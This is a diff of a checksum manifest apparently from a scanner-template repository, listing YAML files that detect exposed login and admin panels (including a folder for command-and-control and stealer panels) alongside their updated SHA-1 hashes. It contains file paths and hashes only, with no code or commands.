+http/exposed-panels/aspect-control-panel.yaml:a2bc19f99c7aa0487d74a728854cf3868c7cdb16 +http/exposed-panels/asus-aicloud-panel.yaml:c492e05824e3d1733c5aa7cb7137f13f0e039d68 +http/exposed-panels/asus-router-panel.yaml:68595324b66752b68779653c4a648d378c16e37b +http/exposed-panels/atlantis-detect.yaml:21850fca551c43ffdcc2690bdd2d3db6105ce586 +http/exposed-panels/atlassian-bamboo-panel.yaml:427965946d01d7634c4fcca6c47f2bc8cef6f4d7 +http/exposed-panels/atlassian-crowd-panel.yaml:b835f66a835eb10380ea003630c08f81851e1fec http/exposed-panels/atvise-login.yaml:d82919ad17fe05c3e356ff3ffa69537da3dfe60c -http/exposed-panels/audiobookshelf-panel.yaml:7631ec45f440cc5bc1288613994511e50e848732 -http/exposed-panels/audiocodes-detect.yaml:b3551c9e5a7569ac94acd3fc8aa7477b44c9ee8a -http/exposed-panels/authelia-panel.yaml:3455ef0c48b8ba2f4a47fa5d4aaa06cf0cd9d7a7 -http/exposed-panels/automatisch-panel.yaml:ad8383b44793df237bc134b2201a638e974a1cd6 -http/exposed-panels/autoset-detect.yaml:02250b44743ad0c8a431a96a8b0f9d32c43f8726 -http/exposed-panels/avantfax-panel.yaml:43f80fc4c9d48a7791bb3603551635f1173aae3b +http/exposed-panels/audiobookshelf-panel.yaml:51005e6314ed6c44292d50d097893912f91817cc +http/exposed-panels/audiocodes-detect.yaml:2c9e88c041cf64dd146f84957b2751db0724dfa9 +http/exposed-panels/authelia-panel.yaml:ca67e96f61a267c91d1c199cee5a0d9ed0d63810 +http/exposed-panels/automatisch-panel.yaml:a53994c1a5db0815e038ccc37acdb42f37129340 +http/exposed-panels/autoset-detect.yaml:5a84b52d14d5e1e04d29db32bdcfbe014c1b8ce4 +http/exposed-panels/avantfax-panel.yaml:4e8de2087acc6e2a9090191b4e23f7eb7892ea33 http/exposed-panels/avatier-password-management.yaml:38996c9eb5b32f11abe87c0cba0b976815d4234c -http/exposed-panels/avaya/avayaaura-cm-panel.yaml:05c772c722208a3ba9b4954a65503c78d2a1d054 -http/exposed-panels/avaya/avayaaura-system-manager-panel.yaml:c35dd0886b4c51aef63aa3c4d82f972d9c25a334 -http/exposed-panels/aviatrix-panel.yaml:09de8bd28d640e2560454251105cd2fa60dcef49 -http/exposed-panels/avigilon-panel.yaml:2696f58e6add1745d674f20f3b76d9c7360ff189 +http/exposed-panels/avaya/avayaaura-cm-panel.yaml:0a0439e772678ba3df943129f4b573dad8b9d911 +http/exposed-panels/avaya/avayaaura-system-manager-panel.yaml:4f0097ef4e358ad20955d93a19263fb95b7eacbc +http/exposed-panels/aviatrix-panel.yaml:656ee7d9231d3fbf761f8dec817824cffae1ad97 +http/exposed-panels/avigilon-panel.yaml:75bcf692640b5f888259844579438ab4502c4327 http/exposed-panels/avtech-avn801-camera-panel.yaml:dc8e439dfd89e634174026399c12b106d28aaadb http/exposed-panels/avtech-dvr-exposure.yaml:d851894a84fce88810c7a0a1cb51f3d67cdaf3b1 -http/exposed-panels/aws-ec2-autoscale.yaml:4b890f0006596c7b1dc1029fa589e72e3e060306 -http/exposed-panels/aws-opensearch-login.yaml:c195e8e304df5798d612090c69e1a971b33a7628 -http/exposed-panels/axel-webserver.yaml:958f5a284a0b63640542e7c47af92b5d75d1dff4 +http/exposed-panels/aws-ec2-autoscale.yaml:73425e4fe6913f293d5f7881cb856a6aea7a5999 +http/exposed-panels/aws-opensearch-login.yaml:4ab95154511db82a50fdef036f9fd12a5e70612e +http/exposed-panels/axel-webserver.yaml:9b944680c791c193d96dbf4dc00a7f9969edf9a2 http/exposed-panels/axigen-webadmin.yaml:31839f1f552a26aa2b20d6fcc66ab85f0f786a9a http/exposed-panels/axigen-webmail.yaml:9714890d8096cd288876e50e9e5ff571982aeaba -http/exposed-panels/axway-api-manager-panel.yaml:9d67ad75d6a19bc8e6dd915388dc5dd0e3181afe -http/exposed-panels/axway-securetransport-panel.yaml:9bbc428c84456ca0b83e6dab3aab625817f2f15a -http/exposed-panels/axway-securetransport-webclient.yaml:761b0f8c68f9284166b5055e0e6283a292dc0d6b -http/exposed-panels/axxon-client-panel.yaml:5dfad13013b703077f5694a1e1a85a7596f724dd +http/exposed-panels/axway-api-manager-panel.yaml:23c43570fa9be182fd0c851813cd15e408aaebe0 +http/exposed-panels/axway-securetransport-panel.yaml:5bbd56d6403ec46b9b102a6e91c71d7b1b0dd137 +http/exposed-panels/axway-securetransport-webclient.yaml:a0e24ec1c4fcf60471cffa062413f66e931b1e7b +http/exposed-panels/axxon-client-panel.yaml:ddb53b9ffd79d6493157ab4abe3440743b0b215b http/exposed-panels/azkaban-web-client.yaml:b2a56dd99826a95f2178f7a5b64ff8c2655cfbe5 http/exposed-panels/backpack/backpack-admin-panel.yaml:e47ae5dd33fe10f06bebcd9a61e6cb186a6fd5fa http/exposed-panels/barracuda-panel.yaml:4a210fef0245e6474e22e175b547422976d8c177 http/exposed-panels/bazarr-login.yaml:07b8b0b2930989f24de751f7138984ea7ff89193 -http/exposed-panels/bedita-panel.yaml:b5e4a71dd497b091890690a39b019d0e89bb6754 -http/exposed-panels/beego-admin-dashboard.yaml:377ed680025661cb56ccbcdf811237fa1ff61455 +http/exposed-panels/bedita-panel.yaml:10c2e506a44e540e7dbe3107994ae39bef4b7d0b +http/exposed-panels/beego-admin-dashboard.yaml:de4d5162431c669efa8c81180922a5f3eaf94914 http/exposed-panels/beyondtrust-login-server.yaml:a10f43fc6e11f61d2bfe063a5bfd1878141549dc http/exposed-panels/beyondtrust-panel.yaml:5f5f9c867a94ed6716efd1f5cb380e817100e294 -http/exposed-panels/beyondtrust-priv-panel.yaml:9183959bf74b98e46dc5b9e76d708fe143445c57 +http/exposed-panels/beyondtrust-priv-panel.yaml:e43653975199669e0d4825546b8f4a7ff08ccea5 http/exposed-panels/bigant-login-panel.yaml:272a945bb73fe5487005faf2e04ea0006185dfbe -http/exposed-panels/bigbluebutton-login.yaml:2a99b5147214ae40e76d0e879cf06e3aff8ef6ea -http/exposed-panels/bigfix-login.yaml:eff11763cd9f5c7536c7eee224ac279b1316f940 -http/exposed-panels/bigip-rest-panel.yaml:135dbd07c58bf64080fd57ba3e141208aee15f64 -http/exposed-panels/biotime-panel.yaml:e37a6f3ae6c6caf12994f05333659ff79a25ff66 -http/exposed-panels/bitdefender-gravityzone.yaml:d5455f12c93a3ed420a4a95c6d8436aea659a578 -http/exposed-panels/bitrix-panel.yaml:22429a793324fc0162acbac1f3f55c02d8f4f8e8 -http/exposed-panels/bitwarden-vault-panel.yaml:e09f103205f35b42990a52cc73e01e155eca6762 -http/exposed-panels/black-duck-panel.yaml:97036b3895473e3fa390f4560ca2bcd99220878d -http/exposed-panels/bloofoxcms-login-panel.yaml:5864e8cac795cb77a526df3d0fb7a2e8321643b8 +http/exposed-panels/bigbluebutton-login.yaml:eb9ee9c32e4e99c23cd327f42277450d9c5345c0 +http/exposed-panels/bigfix-login.yaml:d10d86c8b61f007ce5db054f334a8b78107c8739 +http/exposed-panels/bigip-rest-panel.yaml:a7b3e173b5ec0f2fccebfd9c0b1aac79ca7acdfe +http/exposed-panels/biotime-panel.yaml:f6cfd19f7a3056023187360a45789ae5be555a58 +http/exposed-panels/bitdefender-gravityzone.yaml:91ffd2147f5e5179e64e5b5ddda01204070a3ac6 +http/exposed-panels/bitrix-panel.yaml:581cc2bec4a863984c33f63e430928d65e1b5c04 +http/exposed-panels/bitwarden-vault-panel.yaml:9621c469efe8e3b10c039bb097cd609df9041de1 +http/exposed-panels/black-duck-panel.yaml:c88cedc0a81daf01148aaba3a4c377972042993d +http/exposed-panels/bloofoxcms-login-panel.yaml:499a2503bea69c4a216db13c2e41437d423a29a2 http/exposed-panels/blue-iris-login.yaml:de1cdc950985e02dcf3602e6323491e211e0a0e2 -http/exposed-panels/bmc/bmc-discovery-panel.yaml:b772c8320a2bf73d41c3818cf153a62f80cc0b7b -http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml:307d5cbedb061940908186431518606eb422fa33 +http/exposed-panels/bmc/bmc-discovery-panel.yaml:9e9521ee3a4ca257db4080fb8269f11406d2d9a3 +http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml:a43930f9aba52ab165cd7bffe76fe22c87ce4f05 http/exposed-panels/bmc-panel-detect.yaml:58bb1fc9aecb78435cfdfd60bd77eafad0cab7d0 -http/exposed-panels/bolt-cms-panel.yaml:43b47b64f902654a3cca0ed56c18721974b03f07 +http/exposed-panels/bolt-cms-panel.yaml:5b948be5e94b5973d5c22ab33274970668485114 http/exposed-panels/bomgar-login-panel.yaml:4a3abfc3af8fbb6a7cdc1a013aef84451e2b8797 http/exposed-panels/bonobo-server-panel.yaml:43a9e4867d71b96735ed7204ac8188a73e83d67f -http/exposed-panels/bookstack-panel.yaml:6aa200c15b16ebfaa41c6ede6c814ccae56115fb +http/exposed-panels/bookstack-panel.yaml:15ee36130472773f69fe960e29225455703e01a4 http/exposed-panels/buddy-panel.yaml:612c814fabd73cab9fbcabc30169454db23c583b -http/exposed-panels/buildbot-panel.yaml:c61b26d17d36adafb7f6642b12d64078e3aebc15 -http/exposed-panels/busybox-repository-browser.yaml:39ae82f90249996e5c2d4fcb342cbcc033ddf8b0 -http/exposed-panels/bynder-panel.yaml:6cb1f105a7d932e3123174ce57392fd0e4238a9d -http/exposed-panels/c2/ares-rat-c2.yaml:1aac3bf878b995e385e7543bf774dd43c1c9a498 -http/exposed-panels/c2/brute-ratel-c4.yaml:f2c6438699c51caca084e6ceddebfc4caf1414e2 -http/exposed-panels/c2/caldera-c2.yaml:c1a43e8717bf1ac333504008d95db56d49e9ed65 -http/exposed-panels/c2/covenant-c2.yaml:d6a6f544334d459c6db04f12eb5592591925f76f -http/exposed-panels/c2/deimos-c2.yaml:a51237cb55b47c5d542c73d854832bbcae1dd203 -http/exposed-panels/c2/empire-c2.yaml:bad15edd651a31a08f4ff0e57682feff727339d0 -http/exposed-panels/c2/evilginx.yaml:a78c18ad59ff2f823bfd1f684c394d784f672c32 -http/exposed-panels/c2/hack5-cloud-c2.yaml:09ecb6e6c9b6e4d9eaabd6fa58ef6e46cc50754c -http/exposed-panels/c2/hookbot-rat.yaml:5b48d432583f6e8833680323b5e0608e4f485749 -http/exposed-panels/c2/meduza-stealer.yaml:a863f4fd9fca633e81af76a0827c4c23a277f8e1 -http/exposed-panels/c2/mystic-stealer.yaml:df64f3a942f54a028cad4ba9a6fe2674e97dcd03 -http/exposed-panels/c2/mythic-c2.yaml:43d35184eb63700ea06810e953eecfaac365605b -http/exposed-panels/c2/nh-c2.yaml:5e5ee4c4691a81f0c5550aa34699076eb8019908 -http/exposed-panels/c2/pupyc2.yaml:276b410dc583d2cfd9742a040bc048997d090548 -http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml:8ebbc2a86c1513245e2b68fe7d9d31d56645752c -http/exposed-panels/c2/supershell-c2.yaml:9533bcc7d91683804c11dd054c172d15241e595d -http/exposed-panels/c2/viper-c2.yaml:f708e8061a27834d3811c6ddced04f88548d82cc -http/exposed-panels/cacti-panel.yaml:d8df896275c8442591f3ee3e3fb969618da78aaf +http/exposed-panels/buildbot-panel.yaml:7702647e0fc4c89ff8e2f58a585a6973b37b21f1 +http/exposed-panels/busybox-repository-browser.yaml:f1fe6af01b0574b73175c5acaebbb7065d20b5f7 +http/exposed-panels/bynder-panel.yaml:407d80c3397b24387865d35fa1660ce6427f3b03 +http/exposed-panels/c2/ares-rat-c2.yaml:44c77d5bd0bca70e387701befc98adb4d4884a26 +http/exposed-panels/c2/brute-ratel-c4.yaml:d06c97c5d6a6f60e005a264ea3a4285e32d3cc00 +http/exposed-panels/c2/caldera-c2.yaml:2f48e4e9bcf96c29c73224b2c6e66c398067ed41 +http/exposed-panels/c2/covenant-c2.yaml:f00db91e4d2c8c4545b95d35692b0171f6739915 +http/exposed-panels/c2/deimos-c2.yaml:82076dcdb3f8479bb1f2f88cd37bd3abdda83215 +http/exposed-panels/c2/empire-c2.yaml:c6e59c1d68d9e242b0c902b0d210302996ae31dc +http/exposed-panels/c2/evilginx.yaml:976773ba2af295e89b9ea01e504698b2c8392daa +http/exposed-panels/c2/hack5-cloud-c2.yaml:1444463eb49d03653b7e78baf08b83cb95d18c4c +http/exposed-panels/c2/hookbot-rat.yaml:7d3135c0f08ba60f9c9974930a26498cb461156d +http/exposed-panels/c2/meduza-stealer.yaml:223b88f7ec4a3d9228f3cb81c760c9aeac31205e +http/exposed-panels/c2/mystic-stealer.yaml:815a5bc6d8bfe4008140afe1caddc60ffb6991f1 +http/exposed-panels/c2/mythic-c2.yaml:2a559f2eac1542d87650b530e891cccf6f2b12a9 +http/exposed-panels/c2/nh-c2.yaml:f622c7182dbe54d767118645d3b013279a063c52 +http/exposed-panels/c2/pupyc2.yaml:9d2bec110acba3064a615b5a85fa5e737953a3d3 +http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml:cf444f1b08edfb80171d7d09f4a8496889c6e861 +http/exposed-panels/c2/supershell-c2.yaml:dc5a0f681f4ca9703c7fd27dcc6adafb4f55b8ce +http/exposed-panels/c2/viper-c2.yaml:5abb8fedea2c1f056c2405aebd6b60a1c8789f1f +http/exposed-panels/cacti-panel.yaml:e02b4bf614c6aef8daf1e61833f8326ee26b6cd3 http/exposed-panels/calendarix-panel.yaml:15d8c58acf5ffa87da6baedb078709feff94b176 http/exposed-panels/call-break-cms.yaml:d37a921a0f3dd61db474c8366f58fb02308b0e4f http/exposed-panels/camunda-login-panel.yaml:474070f6901e0b308c48903ded30985dbc033173 -http/exposed-panels/cas-login.yaml:5306b5f25ec74fe5de0dfaeb4553db4cf0573e71 -http/exposed-panels/casaos-panel.yaml:b5b35a1e107699546e8e9f9e743458550dcf48f2 -http/exposed-panels/casdoor-login.yaml:fad04f2809901a34b0e399199f2435442f1084c5 -http/exposed-panels/casemanager-panel.yaml:d3f500a3a04229668da9d25eff8008549cef7184 +http/exposed-panels/cas-login.yaml:51a4d9550ac17d2a7cad4aed83c492ae8d322232 +http/exposed-panels/casaos-panel.yaml:14d4507523e44901f21e911c0c8453cc3466538e +http/exposed-panels/casdoor-login.yaml:aca4dcd8f21ada78e6dd1cb12536605333f0eb67 +http/exposed-panels/casemanager-panel.yaml:a85943cd7f57d70c180a8cbbd7b4878a2b328833 http/exposed-panels/cassia-bluetooth-gateway-panel.yaml:bae531af7faf23fccf9f5e1bf192fbc14ffc9969 -http/exposed-panels/caton-network-manager-system.yaml:a090f70d917315acdb3413100357b0d3c0d218d8 -http/exposed-panels/ccm-detect.yaml:c516a91f314390b740ba2d8ea6c94057b54aec56 -http/exposed-panels/centreon-panel.yaml:b04f3b6e8b7ed6fab27a4a623a6616b90d950023 +http/exposed-panels/caton-network-manager-system.yaml:969ba2441489af0f8dffc6ff77fead8218d9f90a +http/exposed-panels/ccm-detect.yaml:406863e9f1ab1ac61117c2e548ad6fe14b187978 +http/exposed-panels/centreon-panel.yaml:4e9ab1a449c7c9afd805609f9fc41c8430af8c56 http/exposed-panels/cerebro-panel.yaml:708680b790390c4246d766d676c794b797dbbdfd -http/exposed-panels/changedetection-panel.yaml:2c2f4293e72f2df118405a6271f70aa1ad2269ca +http/exposed-panels/changedetection-panel.yaml:b2a5a3356cc32e91b510881ed1db4d194af26e0d http/exposed-panels/checkmk/checkmarx-panel.yaml:debe9bcf72dc5ba4a64bdb335abac742d2f536d9 -http/exposed-panels/checkmk/checkmk-login.yaml:632005d71bfd2e79866e6a0ab0fa972dcc4d146c -http/exposed-panels/checkpoint/ssl-network-extender.yaml:5bf628fdf1d8af661687c70a82dd56e8f503a30a +http/exposed-panels/checkmk/checkmk-login.yaml:c847da00c4587a289512c74d811045e35288b23d +http/exposed-panels/checkpoint/ssl-network-extender.yaml:2c5749064e624282a4d46faeac4459b4b1d850a6 http/exposed-panels/checkpoint-panel.yaml:3e10faa7a34f4dbcbc2819361e5276b4b340f1b2 http/exposed-panels/chemotargets-clarityvista-panel.yaml:4730b549465020474b2681e9b01929d718202c24 -http/exposed-panels/chronos-panel.yaml:613a3c17b062fdf1b8d7199c3843afd09d3cc638 +http/exposed-panels/chronos-panel.yaml:f4ddad901230d3f7ddaf27de06c7328bf39c2a14 http/exposed-panels/cisco/cisco-ace-device-manager.yaml:d8b42920b7972749db66452dc253bfcf54fbb5a7 -http/exposed-panels/cisco/cisco-anyconnect-vpn.yaml:1b7e5990c6297252f2c8ff0e7ba3e83e6ad60d68 -http/exposed-panels/cisco/cisco-asa-panel.yaml:968943e2d4cb0d0808faa4f581b4ba956e6bfc76 -http/exposed-panels/cisco/cisco-edge-340.yaml:3eb07915efbaa42d477be81e95aae24a020afcb7 -http/exposed-panels/cisco/cisco-expressway-panel.yaml:9dae9edcfec3fbb1cb224c72dc16a5e033963e75 -http/exposed-panels/cisco/cisco-finesse-login.yaml:7ffa4124f033a688bc227f6960a631fe5887dd06 -http/exposed-panels/cisco/cisco-integrated-login.yaml:bb0349e1a4b88ad20de26522d2ac92175d27da70 -http/exposed-panels/cisco/cisco-ios-xe-panel.yaml:1e90632e315913527b322d0964aa61d5cf0d30f2 +http/exposed-panels/cisco/cisco-anyconnect-vpn.yaml:0dce7861cc1c1a749c8bde124f191f418e454b9a +http/exposed-panels/cisco/cisco-asa-panel.yaml:2977db89fc7e66fd74317e234f92309219c72769 +http/exposed-panels/cisco/cisco-edge-340.yaml:00188568c66d6b5a7f1a2c134161f44f06658b72 +http/exposed-panels/cisco/cisco-expressway-panel.yaml:0fc133b58ffef74c344d3dd28901c90fe8760df1 +http/exposed-panels/cisco/cisco-finesse-login.yaml:0c3095ed1ae1040d11cbe51004f047fcff0308f1 +http/exposed-panels/cisco/cisco-integrated-login.yaml:ab52072841fa34037bf2104c1592d0cd07ce350a +http/exposed-panels/cisco/cisco-ios-xe-panel.yaml:762867e6f5aea754dbc6a1cfe4aa912b249999c9 http/exposed-panels/cisco/cisco-meraki-exposure.yaml:f28045e467943078da3f8348b6b7ad549e1ebee6 -http/exposed-panels/cisco/cisco-onprem-panel.yaml:1beadf03a860c5558a5f7e5db79863458ac3fbee -http/exposed-panels/cisco/cisco-prime-infrastructure.yaml:e50151f7ba3e8bb273eda6740d3c65c1735578cf -http/exposed-panels/cisco/cisco-sd-wan.yaml:07b6c956c89fe31af289d3d57e9a7b025c56270e +http/exposed-panels/cisco/cisco-onprem-panel.yaml:23ceab4ec9d6eed49097c3b9248ff5cbf24422b3 +http/exposed-panels/cisco/cisco-prime-infrastructure.yaml:75e8a9a72e7060c778feb87b20bbd831e6f9707a +http/exposed-panels/cisco/cisco-sd-wan.yaml:4ac4d6d7fc198b39396d3e2e7a83663da38458e4 http/exposed-panels/cisco/cisco-secure-cn.yaml:4d914ebf8975c06a6336f78501b2d8bd098099a6 -http/exposed-panels/cisco/cisco-secure-desktop.yaml:7fd30c7f01899ea38af27751abe15d087c9b9927 +http/exposed-panels/cisco/cisco-secure-desktop.yaml:63adc77bf727dc4be9bf04f0e391407586f391ba http/exposed-panels/cisco/cisco-sendgrid.yaml:4b379b608a58822a3bea1d2a42aa287ac090c15c -http/exposed-panels/cisco/cisco-systems-login.yaml:54a50018335429afbc37e26a421a62811dff8d6c -http/exposed-panels/cisco/cisco-telepresence.yaml:e9b4284c22e08f4917559c6be0860d2a0454672e -http/exposed-panels/cisco/cisco-ucs-kvm-login.yaml:30c5f3cfe8561c54e0adb4d02392c6da5b62a065 -http/exposed-panels/cisco/cisco-vmanage-login.yaml:5351d182ea82467eccbd30dd51a81fb025495a09 -http/exposed-panels/cisco/cisco-webvpn-detect.yaml:13e201d34aa8034c696fa5c262ea118ddda3adc6 -http/exposed-panels/cisco-firepower-panel.yaml:177776db2f788ac7c3bb6fb4b0c242d4921c58af -http/exposed-panels/cisco-unity-panel.yaml:6fae7cdb91904c1e5848876a1de55d505ef868bb -http/exposed-panels/citrix-adc-gateway-detect.yaml:799ec0472142a2c95e6aa9611b7ad1404bd0b433 -http/exposed-panels/citrix-vpn-detect.yaml:6d5b20d32d07689c25e8552271fde112a03f301c -http/exposed-panels/claris-filemaker-webdirect.yaml:d57f1ab78b3f38be7ac9d80c6a94baadf6b4b307 +http/exposed-panels/cisco/cisco-systems-login.yaml:af0cb3453e9808c0a9648cc2d25fc9e65e08a81e +http/exposed-panels/cisco/cisco-telepresence.yaml:9db2def73db078a254c5b4eff1541453498a4cae +http/exposed-panels/cisco/cisco-ucs-kvm-login.yaml:9b3c57c86f79f364a67288a863d9c8940eac8a20 +http/exposed-panels/cisco/cisco-vmanage-login.yaml:c5af5adca19c7d24439d97b2518d817ab87aa4b3 +http/exposed-panels/cisco/cisco-webvpn-detect.yaml:55a43e3bda0dcb3e1ba0f5081da01b3208aacad2 +http/exposed-panels/cisco-firepower-panel.yaml:cb1fb94711725facf89b7ab6ef1205e892a99336 +http/exposed-panels/cisco-unity-panel.yaml:9ceb9479c43bad400f147deaee4a00dc876836d4 +http/exposed-panels/citrix-adc-gateway-detect.yaml:06dc312413b2b1d3ebf19c296889fa334f5f647e +http/exposed-panels/citrix-vpn-detect.yaml:5585b4081f2efdfca91079846020ca7b27e13528 +http/exposed-panels/claris-filemaker-webdirect.yaml:dd77305865036acb976acb7694f4757fb52cbd2a http/exposed-panels/clave-login-panel.yaml:90afd28a8bfd3d9b9c39d876d2cb91045a889a03 -http/exposed-panels/cleanweb-panel.yaml:9ea5c4486cfbb1411034406155a944a9a2248746 -http/exposed-panels/clearpass-policy-manager.yaml:1905cee20c96532981dc53906d204b3726d143ef -http/exposed-panels/cloudpanel-login.yaml:956d80bf87651d667b1a94b5a695831146beed9d +http/exposed-panels/cleanweb-panel.yaml:8a4e05d6524c5eaba439a1c596fcd1d500a3deda +http/exposed-panels/clearpass-policy-manager.yaml:6e793ecc522d0af3dbfd15927d4b4c57b597209e +http/exposed-panels/cloudpanel-login.yaml:8ad7fee3c78a1972d5e0c99fb73716a88ea17dbb http/exposed-panels/cloudphysician-radar.yaml:eb5cbbfc663e1a52e20b5b1410488ceb7a1d4506 -http/exposed-panels/cobbler-webgui.yaml:636874f8e0a773001ada2a747142447f7dd1999e -http/exposed-panels/code-server-login.yaml:d3a36f9c6dd9d323bc47a89e7a7e1ee01dc51c09 -http/exposed-panels/code42-panel.yaml:ff060b9d277178c6851cc3043400a55532940e16 -http/exposed-panels/codemeter-webadmin-panel.yaml:fd934518427868987909a34b8ece99d5b95446aa +http/exposed-panels/cobbler-webgui.yaml:6919892ff85677989778d176fb091210e8581040 +http/exposed-panels/code-server-login.yaml:287f78d4d52fd0ed9c702c3dab8a02f151d24c97 +http/exposed-panels/code42-panel.yaml:13bc826fff640dc0b5b39461f96b69a3bc03a399 +http/exposed-panels/codemeter-webadmin-panel.yaml:147ab873f95b06a359dbc19321b95496efb897f6 http/exposed-panels/cofense-vision-panel.yaml:669c49fd2cf7b5f9adc03df8bbe4c3069349aa65 -http/exposed-panels/coldfusion-administrator-login.yaml:d66316f3900e7171e20590265d60d4fb657e128e -http/exposed-panels/compal-panel.yaml:2f3c7cb3a45097f9d96737d1bda8391335ab633d -http/exposed-panels/compalex-panel-detect.yaml:55a842a0b1a101567de2137e3efe35625d59a195 -http/exposed-panels/completeview-web-panel.yaml:d50d5183d2cc41f34b57458aca38cec41667981f +http/exposed-panels/coldfusion-administrator-login.yaml:2cc48f8053b4e58ff9e46b231b07c8383728e093 +http/exposed-panels/compal-panel.yaml:89fd1d8b806ca685bfd5093faa2b7ff8b95266b4 +http/exposed-panels/compalex-panel-detect.yaml:d0554827cb8fbd2464dca3d1641370fb75283bed +http/exposed-panels/completeview-web-panel.yaml:abe3197806c0c1413b7298eda4e720870167ba8c http/exposed-panels/concourse-ci-panel.yaml:5a2254ed1f56853cdd1a228aa59f722f4b3d1dbf -http/exposed-panels/concrete5/concrete5-install.yaml:b2e0db8caf65baf9bfdb72185f9c8eb458d4e04d -http/exposed-panels/concrete5/concrete5-panel.yaml:3845bbaf227f500e0a324feec978e2765c941c5e -http/exposed-panels/connect-box-login.yaml:8985fd9bf0bbc667f6f8d24b4c576d2ed4b26b49 -http/exposed-panels/connectwise-backup-manager.yaml:6bf4ffa84a4db79bde15ce9c922b52e11f5b6c6b -http/exposed-panels/connectwise-panel.yaml:8aae954994f6950f657af687c0e0055e22b6ec99 -http/exposed-panels/contao-login-panel.yaml:4f5f107f398d595dba7995f7a6b075f6cd89a6cf -http/exposed-panels/content-central-login.yaml:b7f5b14c274c71b4e2dbe3647554b796a769f0f6 +http/exposed-panels/concrete5/concrete5-install.yaml:3d23a18cf30d4a339852fca4590a72ec593cb753 +http/exposed-panels/concrete5/concrete5-panel.yaml:e703716fdc17f28f86d5b59407a2ee3aaa3aa934 +http/exposed-panels/connect-box-login.yaml:294bc961746a193240b493661cf8359a6f7a7f68 +http/exposed-panels/connectwise-backup-manager.yaml:c62a0d2a8e5a17f0dbbd6192427d69b0ea090e49 +http/exposed-panels/connectwise-panel.yaml:f4a585fedba50c32ce340ee06432e66d0e57e5dc +http/exposed-panels/contao-login-panel.yaml:dc391dce8ace5901014e7c1c8f85d009f2ffc363 +http/exposed-panels/content-central-login.yaml:ef5e89a5033d69eb52278359e95bed0d87de381c http/exposed-panels/contentkeeper-detect.yaml:0f30c32461c2433e369abee80c437e3955e6d974 -http/exposed-panels/corebos-panel.yaml:f5c97e99526a78856683eab9bead66f41151d5bb -http/exposed-panels/cortex-xsoar-login.yaml:73c55686323fbaf56a48c90d96ca1a55295d78f6 -http/exposed-panels/couchdb-exposure.yaml:ff98d142744ff74de39b724b5733b9584e39697d -http/exposed-panels/couchdb-fauxton.yaml:b0447223641003425221f1a22f1809b82bc64558 +http/exposed-panels/corebos-panel.yaml:8797209448f3462ecf145bd5223229760314c9fb +http/exposed-panels/cortex-xsoar-login.yaml:c2727d5f2c2a790fe1923e3b179dec1ac702579f +http/exposed-panels/couchdb-exposure.yaml:021c44f7f58d6278988fa8b7d7d41c29ab64774a +http/exposed-panels/couchdb-fauxton.yaml:6e38b917fc714fd65319c284f5bc808359bfdece http/exposed-panels/cox-business-panel.yaml:69406ee37514b80af11858b11dd20786215a7f6e -http/exposed-panels/cpanel-api-codes.yaml:a26ac3c4c4cb3e32b40376f94d2d4cd90387ead7 -http/exposed-panels/craftcms-admin-panel.yaml:ad84bef6e6da1edf763aad80aaa6de3a91d2f395 -http/exposed-panels/craftercms-panel.yaml:7746ab0c30459db7e6f5bf023bf55ec47a7eeb90 -http/exposed-panels/creatio-login-panel.yaml:be251ed8449b36fffd157869473e9d02d523f573 -http/exposed-panels/crontab-ui.yaml:7504a353c3dc9824fefa0aae8181f1d1432e8ed9 -http/exposed-panels/crush-ftp-login.yaml:fd6d8e7854c0b21aefe3ccd2c888a28e5605a996 +http/exposed-panels/cpanel-api-codes.yaml:b9adb23aaff17aef678624a7118f0abcae43de8f +http/exposed-panels/craftcms-admin-panel.yaml:0b6fcdd704968eed3f9650f2373485be468f884c +http/exposed-panels/craftercms-panel.yaml:63804e4b3480a8eec1f71cd8b13a527fce5e1710 +http/exposed-panels/creatio-login-panel.yaml:b1d798e6d7fa4a13f7e5fb458c25ec083e558ab7 +http/exposed-panels/crontab-ui.yaml:1564566ce3c3ce8f20f23d2675783fea7d47d9fb +http/exposed-panels/crush-ftp-login.yaml:b90b7e9bbf6255ffe03470b9da8de3b8a5ac6731 http/exposed-panels/crxde-lite.yaml:65ed3b8bdac70ea67b50f46dc919ba9618f6794c -http/exposed-panels/cryptobox-panel.yaml:331a79e499fa5b98536dd6cb4dc72949a6110419 +http/exposed-panels/cryptobox-panel.yaml:59fcbdd41233da4fbd04fd39ee4acfc3963b4979 http/exposed-panels/csod-panel.yaml:52cb0acb09040a3d634c9ccae3f2d73bcb83333b -http/exposed-panels/cudatel-panel.yaml:c079445a851e40233a8c56dfda788e5c9b32547b -http/exposed-panels/cvent-panel-detect.yaml:a87e443274a8ae60dfeb181ff9e3ab288246d852 -http/exposed-panels/cwp-webpanel.yaml:9ccee2ed3e4baface4e30a0567b2e46c2976851e +http/exposed-panels/cudatel-panel.yaml:6576d6a6c8ade677b0d203cd28c6fdad2b51174f +http/exposed-panels/cvent-panel-detect.yaml:f9c8eab45389a0a4e441572c779c78fd55ecfaf4 +http/exposed-panels/cwp-webpanel.yaml:26dbf3a67985f7fea63779d12b66e4939cc01941 http/exposed-panels/cx-cloud-login.yaml:eacbb09b6c7b16b4234ac371e71b2130c738cb5e -http/exposed-panels/cyberchef-panel.yaml:53cd896d234ec5f37fa902dfd42e5b07227b7536 -http/exposed-panels/cyberoam-ssl-vpn-panel.yaml:93abfca996a479f9098e274c3fa5519f6e64f3f9 +http/exposed-panels/cyberchef-panel.yaml:a6d39974a7a8e91f93cc6bf215a43b6ce7610d31 +http/exposed-panels/cyberoam-ssl-vpn-panel.yaml:126ac6089d0fa5f57abefcdcf8cdccc8b2fcf6e6 http/exposed-panels/d-link-wireless.yaml:dbcf6912b865faa71a59141e83d00456ce6ceef0 -http/exposed-panels/dahua-web-panel.yaml:c7b88f6dd9cec15974fab83f071cf7ad63d37ee0 -http/exposed-panels/darktrace-threat-visualizer.yaml:e3703a7fac50be4b9ffa1cbc2723b9861644e128 -http/exposed-panels/dashy-panel.yaml:34026fb79cebfc1241ab0b200429878e911f47de -http/exposed-panels/datadog-login.yaml:47ca4ed32dcc8008c7b28c4c3cd33c3c22d40abd -http/exposed-panels/dataease-panel.yaml:4f5e2a4ac4a97a2a91eae2cb4e5a8b0dc541c52a -http/exposed-panels/dataiku-panel.yaml:c540620ec2ab83c4b264036b884551f18176ef9d -http/exposed-panels/davantis-panel.yaml:7eb67eca4fad64146eed194f8a973c3029738d7d 